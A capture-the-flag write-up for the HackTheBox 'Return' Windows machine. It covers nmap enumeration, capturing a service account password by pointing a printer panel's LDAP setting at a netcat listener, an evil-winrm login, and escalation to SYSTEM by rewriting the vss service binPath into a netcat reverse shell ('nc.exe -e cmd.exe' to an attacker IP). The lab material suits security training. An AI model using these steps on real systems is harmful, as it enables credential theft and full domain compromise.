Return Writeup Hackthebox

![](https://imgur.com/twDnGyV.png) ### Enumeration ``` ╭─tahaafarooq at urchinsec in ~/Desktop/hackthebox/machines/return ╰─○ nmap -A 10.129.95.241 -oN nmap-scan Starting Nmap 7.80 ( https://nmap.org ) at 2021-12-07 12:24 EAT Nmap scan report for 10.129.95.241 Host is up (0.16s latency). Not shown: 987 closed ports PORT STATE SERVICE VERSION 53/tcp open domain? 80/tcp open http Microsoft IIS httpd 10.0 | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 |_http-title: HTB Printer Admin Panel 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-12-07 09:44:18Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 49154/tcp filtered unknown Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 18m34s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2021-12-07T09:46:43 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 322.67 seconds ``` We have multiple ports open , and it seems port 80 is running with an admin panel for a printer, we also got SMB opened , and we have an LDAP port opened , this is a really interesting box :+1: ### FootHold First thing I do now is visit the port 80: ![](https://imgur.com/kiChdAt.png) I visited the Settings which was in `http://return.htb/settings.php` and found a subdomain : `http://printer.return.local` so I now add that to my `/etc/hosts` file ![](https://imgur.com/Bi9Reg5.png) So we also got `svc-printer` as username! But basically these printer's configuration page allow a user to set a way of grabbing the queries of user list and passwords from the LDAP or AD port so , what if I made a listener of port 389 which is LDAP , and then I change the server address on the settings and see what will happen...: ![](https://imgur.com/gR9YIZ1.png) ``` ╰─○ sudo nc -lvnp 389 Listening on 0.0.0.0 389 Connection received on 10.129.95.241 49570 0*`%return\svc-printer� 1edFg43012!! ``` So I got the password `1edFg43012!!` , And now I just use my sweet `evil-winrm` to try gain an instance of shell from the creds I got: ``` ╰─○ evil-winrm -i 10.129.95.241 -u svc-printer -p '1edFg43012!!' Evil-WinRM shell v3.3 Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami return\svc-printer ``` ### Privilege Escalation ``` *Evil-WinRM* PS C:\Users\svc-printer\Documents> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= =================================== ======= SeMachineAccountPrivilege Add workstations to domain Enabled SeLoadDriverPrivilege Load and unload device drivers Enabled SeSystemtimePrivilege Change the system time Enabled SeBackupPrivilege Back up files and directories Enabled SeRestorePrivilege Restore files and directories Enabled SeShutdownPrivilege Shut down the system Enabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Enabled SeTimeZonePrivilege Change the time zone Enabled ``` Not much but useful, decided to check the group I was in, i hope I was in Administrators but it twisted wrong ``` *Evil-WinRM* PS C:\Users\svc-printer\Documents> net user svc-printer User name svc-printer Full Name SVCPrinter Comment Service Account for Printer User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 5/26/2021 12:15:13 AM Password expires Never Password changeable 5/27/2021 12:15:13 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 5/26/2021 12:39:29 AM Logon hours allowed All Local Group Memberships *Print Operators *Remote Management Use *Server Operators Global Group memberships *Domain Users The command completed successfully. ``` So `svc-printer` is part of Server Operators : https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-serveroperators So I now understood that it was easy for me to get a quick revshell as `NT Authority/system` , I first set a reverse shell listener on port 1234, since members of this group are able to start and stop services now after firing up the listener , I will exploit the vss service running with sc.exe which is alternative of `systemctl` in linux , but first things first , Upload NETCAT : ``` *Evil-WinRM* PS C:\Users\svc-printer\Documents> upload nc.exe Info: Uploading nc.exe to C:\Users\svc-printer\Documents\nc.exe Data: 51488 bytes of 51488 bytes copied Info: Upload successful! ``` And now the good part is to misconfigure the service! that is about to run : ``` *Evil-WinRM* PS C:\Users\svc-printer\Documents> sc.exe config vss binPath="C:\Users\svc-printer\Documents\nc.exe -e cmd.exe 10.10.14.15 1234" [SC] ChangeServiceConfig SUCCESS ``` We start stop the service , if it's running with the command `sc.exe stop vss` and then we start our service which will execute our netcat revshell: ![](https://imgur.com/SFc35WI.png) And now we have access to Administrator account! The `user.txt` flag can be found in Desktop for `svc-printer` and for `root.txt` inside Desktop for `Administrator` ![](https://c.tenor.com/qMER41oNWx8AAAAC/youve-been-hacked-gregory-brown.gif)